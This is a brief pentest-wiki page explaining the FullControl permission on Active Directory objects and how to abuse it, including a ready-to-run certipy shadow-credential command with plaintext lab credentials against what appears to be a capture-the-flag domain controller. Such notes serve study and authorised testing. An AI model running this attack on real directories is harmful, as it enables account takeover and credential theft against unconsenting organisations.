FullControl

Information

GenericAll vs. FullControl

Full Control typically refers to the highest level of permissions granted on an object in AD. It allows the user or group to perform all actions on the object, including creating, deleting, modifying, and changing permissions.

Exploitation

Password Change

Check how here.

Shadow Credential

Get the object's hash and perform a PtH attack.

certipy shadow auto -username oorend@rebound.htb -password '1GR8t@$$4u' -k -account winrm_svc -target dc01.rebound.htb

Last updated

Was this helpful?